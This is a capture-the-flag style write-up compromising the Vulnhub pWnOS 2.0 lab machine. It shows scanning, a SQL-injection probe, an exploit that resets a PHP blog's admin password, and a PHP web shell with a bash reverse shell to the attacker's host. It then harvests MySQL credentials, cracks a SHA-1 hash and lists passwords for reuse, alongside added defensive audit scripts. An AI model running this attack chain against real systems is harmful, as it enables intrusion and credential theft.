pWnOS2.0 target machine pentest (CMS pentest, PHP+MySQL website pentest, password reuse)


Target introduction

Vulnhub target machine

Local setup

Because of how this VM is built, it cannot be found by scanning when its network adapter is in NAT mode; it turns out the NAT network address has to be changed first.

Reference method
https://blog.csdn.net/Bossfrank/article/details/131415257
Author's homepage
https://blog.csdn.net/Bossfrank?type=blog
PS: the UCAS master's student who wrote this is very impressive, really impressive; learned a lot 🙏

nmap information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 10.10.10.0/24
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:37 CST
Nmap scan report for localhost (10.10.10.1)
Host is up (0.00035s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for bogon (10.10.10.2)
Host is up (0.00010s latency).
MAC Address: 00:50:56:F3:32:0E (VMware)
Nmap scan report for bogon (10.10.10.100)
Host is up (0.00019s latency).
MAC Address: 00:0C:29:8D:63:FF (VMware)
Nmap scan report for localhost (10.10.10.128)
Host is up (0.00012s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for bogon (10.10.10.254)
Host is up (0.000068s latency).
MAC Address: 00:50:56:EB:94:F3 (VMware)
Nmap scan report for localhost (10.10.10.129)
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 1.92 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:39 CST
Nmap scan report for bogon (10.10.10.100)
Host is up (0.000045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:8D:63:FF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST
Nmap scan report for bogon (10.10.10.100)
Host is up (0.00037s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:8D:63:FF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST
Stats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 91.09% done; ETC: 20:42 (0:00:08 remaining)
Stats: 0:02:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.56% done; ETC: 20:44 (0:00:11 remaining)
Nmap scan report for bogon (10.10.10.100)
Host is up (0.00034s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:8D:63:FF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 395.77 seconds
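
As an added example (not part of the original write-up), the following Python script parses nmap normal output like the scans above and turns the NSE results into remediation items a defender would track: the PHPSESSID cookie without HttpOnly, the Slowloris result, the end-of-life Apache 2.2 banner, and scripts that errored out and need a manual re-check. The sample text is constructed from the scan output shown; the severity labels and remediation hints are this example's own assumptions, not nmap's.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: excerpts of the nmap -sV and --script=vuln output shown
# above, trimmed to the lines the parser cares about.
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:8D:63:FF (VMware)
"""

# "22/tcp open  ssh     OpenSSH 5.8p1 ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# An NSE script header is "| name:" or "|_name:" with no extra indentation;
# indented lines such as "|   VULNERABLE:" belong to the current script's body.
SCRIPT_HEAD_RE = re.compile(r"^\|(?:_| )([\w-]+):\s*(.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)  # script name -> body lines


def parse_nmap(text):
    """Parse nmap normal output into Port objects with their NSE script results."""
    ports = []
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            ports.append(Port(int(m[1]), m[2], m[3], m[4], m[5]))
            current = None
            continue
        if not ports or not line.startswith("|"):
            continue
        h = SCRIPT_HEAD_RE.match(line)
        if h:
            current = h[1]
            ports[-1].scripts[current] = [h[2]] if h[2] else []
        elif current:
            body = line.lstrip("|_").strip()
            if body:
                ports[-1].scripts[current].append(body)
    return ports


def triage(ports):
    """Turn parsed results into (port, severity, action) tuples for the defender.
    Severities and wording are this example's own heuristics (assumptions)."""
    findings = []
    for p in ports:
        if p.state != "open":
            continue
        # Apache 2.2 reached end-of-life in 2017; the banner alone is a finding.
        if p.version.startswith("Apache httpd 2.2"):
            findings.append((p.number, "high", "Apache 2.2 branch is end-of-life; upgrade"))
        for name, body in p.scripts.items():
            joined = " ".join(body)
            if name == "http-cookie-flags" and "httponly flag not set" in joined:
                # Body looks like ["/:", "PHPSESSID:", "httponly flag not set"]
                cookie = next((ln[:-1] for ln in body
                               if ln.endswith(":") and not ln.startswith("/")), "?")
                findings.append((p.number, "medium", f"cookie {cookie} is missing HttpOnly"))
            elif name == "http-slowloris-check" and "State: LIKELY VULNERABLE" in joined:
                findings.append((p.number, "low", "slowloris: set mod_reqtimeout and connection limits"))
            elif joined.startswith("ERROR:"):
                findings.append((p.number, "info", f"{name} did not run; check manually"))
    return findings


if __name__ == "__main__":
    for port, sev, action in triage(parse_nmap(NMAP_OUTPUT)):
        print(f"{port}/tcp [{sev}] {action}")
```

Scripts whose output says "Couldn't find any ..." produce no item, and a scan report saved with `nmap -oN` can be fed to `parse_nmap` unchanged because it uses the same text layout.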

Web penetration

"Welcome to this site. If you have any questions, please email admin@isints.com"
Directory brute-forcing

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://10.10.10.100
[sudo] password for kali:

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Sep 29 23:08:26 2024
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:6001)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5750)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:5034)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5392)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Sep 29 23:08:34 2024
DOWNLOADED: 9224 - FOUND: 30

Try a quick injection against login.php:
' or 1=1 --   (or ' or 1=1 #)
Funny: it dumped the source code instead.

Grep the directory brute-force results for the pages that returned 200.
This looks like a content management system, so look for the CMS name.
At
view-source:http://10.10.10.100/blog/index.php
it identifies itself as Simple PHP Blog 0.4.0.
Look it up in the exploit database.

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo searchsploit simple php blog 0.4.0
[sudo] password for kali: 
------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                            |  Path
------------------------------------------------------------------------------------------ ---------------------------------
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities          | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities     | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s                                                 | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                             | php/webapps/16883.rb
------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ searchsploit simple php blog -m 1191
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #
  Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
      URL: https://www.exploit-db.com/exploits/1191
     Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
    Codes: OSVDB-19070, CVE-2005-2787, OSVDB-19012, CVE-2005-2733, OSVDB-17779, CVE-2005-2192
 Verified: True
File Type: Perl script text executable
Copied to: /home/kali/testPwnos2.0/1191.pl

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ ls
1191.pl  dir.ori

sudo apt-get install libswitch-perl

________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Program : 1191.pl
Version : v0.1
Date    : 8/25/2005
Descript: This perl script demonstrates a few flaws in
          SimplePHPBlog.
Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
          DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
          NOT HAVE PERMISSION TO DO SO!
          Please see this script comments for solution/fixes
          to demonstrated vulnerabilities.
          http://www.simplephpblog.com
Usage   : 1191.pl [-h host] [-e exploit]
          -?      : this menu
          -h      : host
          -e      : exploit
             (1)  : Upload cmd.php in [site]/images/
             (2)  : Retreive Password file (hash)
             (3)  : Set New User Name and Password
                    [NOTE - uppercase switches for exploits]
                    -U      : user name
                    -P      : password
             (4)  : Delete a System File
                    -F      : Path and System File
Examples: 1191.pl -h 127.0.0.1 -e 2
          1191.pl -h 127.0.0.1 -e 3 -U l33t -P l33t
          1191.pl -h 127.0.0.1 -e 4 -F ./index.php
          1191.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd
          1191.pl -h 127.0.0.1 -e 1

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo perl 1191.pl -h http://10.10.10.100/blog -e 3 -U hugomc -P hugomc
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: hugomc
Password is set to: hugomc
*** Exploit Completed....
Have a nice day! :)

Upload a web shell to get an initial shell.

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ cat shell.php          
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.129/1234 0>&1'"); ?>

Upload this shell through the blog.

Given the directory brute-force results, the shell should end up at http://10.10.10.100/blog/images/shell.php; start a listener, request that URL, and the shell connects back.

Initial shell obtained

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                                     [0/41]
└─$ sudo ncat -lvnp 1234                         
[sudo] password for kali:  
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.100:34941.
bash: no job control in this shell
www-data@web:/var/www/blog/images$ 

Now try privilege escalation

www-data@web:/var/www/blog/images$ whoami
whoami
www-data
www-data@web:/var/www/blog/images$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe8d:63ff/64 scope link 
       valid_lft forever preferred_lft forever
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@web:/var/www/blog/images$ uname -a
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
www-data@web:/var/www/blog/images$ python --version
python --version
Python 2.7.1+
www-data@web:/var/www/blog/images$ 

Use python to upgrade to an interactive tty

www-data@web:/var/www/blog/images$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"

Look for leaked sensitive files

www-data@web:/var/www/blog/images$ pwd
pwd
/var/www/blog/images
www-data@web:/var/www/blog/images$ cd ..
cd ..
www-data@web:/var/www/blog$ ls
ls
add.php                 flash                   rate_cgi.php
add_block.php           image_list.php          rdf.php
add_cgi.php             images                  recompress.php
add_link.php            index.php               rss.php
add_static.php          info.php                scripts
add_static_cgi.php      install00.php           search.php
atom.php                install01.php           set_login.php
categories.php          install02.php           set_login_cgi.php
colors.php              install03.php           setup.php
colors_cgi.php          install03_cgi.php       setup_cgi.php
comment_add_cgi.php     interface               static.php
comment_delete_cgi.php  languages               stats.php
comments.php            languages.php           themes
config                  languages_cgi.php       themes.php
contact.php             login.php               trackback.php
contact_cgi.php         login_cgi.php           trackback_delete_cgi.php
content                 logout.php              upgrade.php
delete.php              options.php             upload_img.php
delete_static.php       options_cgi.php         upload_img_cgi.php
docs                    preview_cgi.php         upload_img_new.php
downgrade.php           preview_static_cgi.php
www-data@web:/var/www/blog$ cd ..
cd ..
www-data@web:/var/www$ ls
ls
activate.php  includes   info.php   mysqli_connect.php
blog          index.php  login.php  register.php

That looks promising

www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
www-data@web:/var/www$ 

That password does not work. Are there other copies of the config file?

www-data@web:/var/www$ mysql -uroot -pgoodday
mysql -uroot -pgoodday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)

Yes: the database connection file in the other location has different contents

www-data@web:/var/www$ find / -name mysqli_connect.php 2>/dev/null
find / -name mysqli_connect.php 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php
www-data@web:/var/www$ cat /var/mysqli_connect.php
cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
www-data@web:/var/www$ 
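Two world-readable copies of mysqli_connect.php, both connecting as the MySQL root user, are what hands the web account its next foothold. The following is an added audit script, not part of the original write-up: it walks a directory tree for PHP files that DEFINE DB_PASSWORD and reports root DB users and loose permissions; the demo tree it builds is constructed to mirror the two files above (the live password is a placeholder, not the target's).

```python
import os
import re
import stat
import tempfile
from typing import Dict, List

# Matches the DEFINE ('DB_USER', '...') / DEFINE ('DB_PASSWORD', '...') lines
# of the mysqli_connect.php files shown above.
DEFINE_RE = re.compile(
    r"""DEFINE\s*\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""", re.IGNORECASE
)


def parse_db_defines(text: str) -> Dict[str, str]:
    """Return the DB_* constants a PHP config file defines."""
    return {key.upper(): value for key, value in DEFINE_RE.findall(text)}


def audit_db_configs(root: str) -> List[dict]:
    """One finding per .php file under root that defines DB_PASSWORD.

    Paths are reported relative to root so results are stable across runs.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    defines = parse_db_defines(fh.read())
            except OSError:
                continue
            if "DB_PASSWORD" not in defines:
                continue
            mode = os.stat(path).st_mode
            issues = []
            if defines.get("DB_USER", "").lower() == "root":
                issues.append("application connects as MySQL root")
            if mode & stat.S_IROTH:
                issues.append("world-readable")
            if mode & stat.S_IRGRP:
                issues.append("group-readable")
            findings.append({
                "path": os.path.relpath(path, root),
                "db_user": defines.get("DB_USER"),
                "issues": issues,
            })
    return findings


def build_demo_tree() -> str:
    """Constructed stand-in for /var on the target: a stale copy under www/
    and a live copy one level up, both mode 0644, plus one safe sibling."""
    base = tempfile.mkdtemp(prefix="dbconf-audit-")
    os.makedirs(os.path.join(base, "www"))
    # Modelled on the file shape above; the live password is a placeholder.
    template = ("<?php\nDEFINE ('DB_USER', 'root');\nDEFINE ('DB_PASSWORD', '{pw}');\n"
                "DEFINE ('DB_HOST', 'localhost');\nDEFINE ('DB_NAME', 'ch16');\n?>\n")
    for rel, pw in (("www/mysqli_connect.php", "goodday"),
                    ("mysqli_connect.php", "PLACEHOLDER_LIVE_PASSWORD")):
        path = os.path.join(base, rel)
        with open(path, "w") as fh:
            fh.write(template.format(pw=pw))
        os.chmod(path, 0o644)
    # Safe sibling: dedicated low-privilege DB user, owner-only permissions.
    safe = os.path.join(base, "www", "safe_connect.php")
    with open(safe, "w") as fh:
        fh.write(template.format(pw="x").replace("'root'", "'blog_app'"))
    os.chmod(safe, 0o600)
    return base


if __name__ == "__main__":
    for finding in audit_db_configs(build_demo_tree()):
        print(finding["path"], finding["db_user"], finding["issues"] or "ok")
```

Run it against a real web root (for example /var on this box) to get the same report for actual files.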

Logged in to MySQL successfully

www-data@web:/var/www$ mysql -uroot -proot@ISIntS
mysql -uroot -proot@ISIntS
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 36
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

Look at what the database holds

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ch16               |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use ch16
use ch16
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users          |
+----------------+
1 row in set (0.00 sec)

Look at the users table

mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email            | pass                                     | user_level | active | registration_date   |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
|       1 | Dan        | Privett   | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |          0 | NULL   | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)

The password hash is identified as SHA-1

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ hash-identifier c2c4b4e51d9e23c02c15702c136c3e950ba9a4af
   [hash-identifier v1.2 ASCII banner, By Zion3R, www.Blackploit.com]
--------------------------------------------------
 Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

With the hash in hand, try to crack the SHA-1.
The recovered password is

c2c4b4e51d9e23c02c15702c136c3e950ba9a4af:killerbeesareflying
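The users table stores passwords as bare, unsalted SHA-1 digests, which is why the value above falls to a wordlist lookup. As an added example (not part of the original write-up), the Python below flags SHA-1-shaped values in a users table, shows the one-hash-per-guess check that makes them cheap to crack, and stores a password the salted, iterated way instead; the sample rows are constructed from the table above and the PBKDF2 round count is an assumption.

```python
import hashlib
import hmac
import os
import re
from typing import Iterable, List, Optional, Tuple

# A raw SHA-1 hex digest is exactly 40 hex characters, the shape seen in the
# `pass` column of ch16.users above (and what hash-identifier reports).
HEX40 = re.compile(r"^[0-9a-f]{40}$")

# Constructed rows modelled on the users table: (user_id, email, pass).
# Row 2 is a made-up user whose password is stored in the hardened format.
SAMPLE_ROWS: List[Tuple[int, str, str]] = [
    (1, "admin@isints.com", "c2c4b4e51d9e23c02c15702c136c3e950ba9a4af"),
    (2, "constructed@example.com", "pbkdf2_sha256$210000$00ff$abcd"),
]


def looks_like_sha1(stored: str) -> bool:
    """True when a stored password value has the shape of an unsalted SHA-1 digest."""
    return bool(HEX40.match(stored.lower()))


def audit_password_column(rows: Iterable[Tuple[int, str, str]]) -> List[int]:
    """Return the user_ids whose password is stored as a bare SHA-1 digest."""
    return [uid for uid, _email, stored in rows if looks_like_sha1(stored)]


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def dictionary_check(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the candidate whose plain SHA-1 equals `stored`, else None.

    One cheap hash per guess and no salt: that is the whole weakness an
    online lookup table exploits against the digest from the table.
    """
    stored = stored.lower()
    for word in wordlist:
        if hmac.compare_digest(sha1_hex(word), stored):
            return word
    return None


# Hardened storage: salted, iterated PBKDF2-HMAC-SHA256 from the standard
# library (bcrypt or argon2 would be the usual choice; this keeps the example
# dependency-free). The round count is an assumption for the example.
PBKDF2_ROUNDS = 210_000


def make_password_record(password: str) -> str:
    """Fresh random salt per user, so identical passwords give different records."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password_record(password: str, record: str) -> bool:
    try:
        algo, rounds, salt_hex, dk_hex = record.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("rows stored as bare SHA-1:", audit_password_column(SAMPLE_ROWS))
    # Constructed three-word list; the last entry is the password recovered above.
    words = ["password", "letmein", "killerbeesareflying"]
    print("dictionary hit:", dictionary_check(SAMPLE_ROWS[0][2], words))
    record = make_password_record("killerbeesareflying")
    print("hardened record verifies:", verify_password_record("killerbeesareflying", record))
    print("hardened record looks like SHA-1:", looks_like_sha1(record))
```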

Check /etc/passwd to confirm the user names

www-data@web:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:0:0:MySQL Server,,,:/root:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:104:110::/var/lib/landscape:/bin/false 
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash

Credential reuse

Try the collected credentials against SSH.
Candidate user names

administrator
admin
dan
root
hugomc

Candidate passwords

killerbeesareflying
root@ISIntS
hugomc

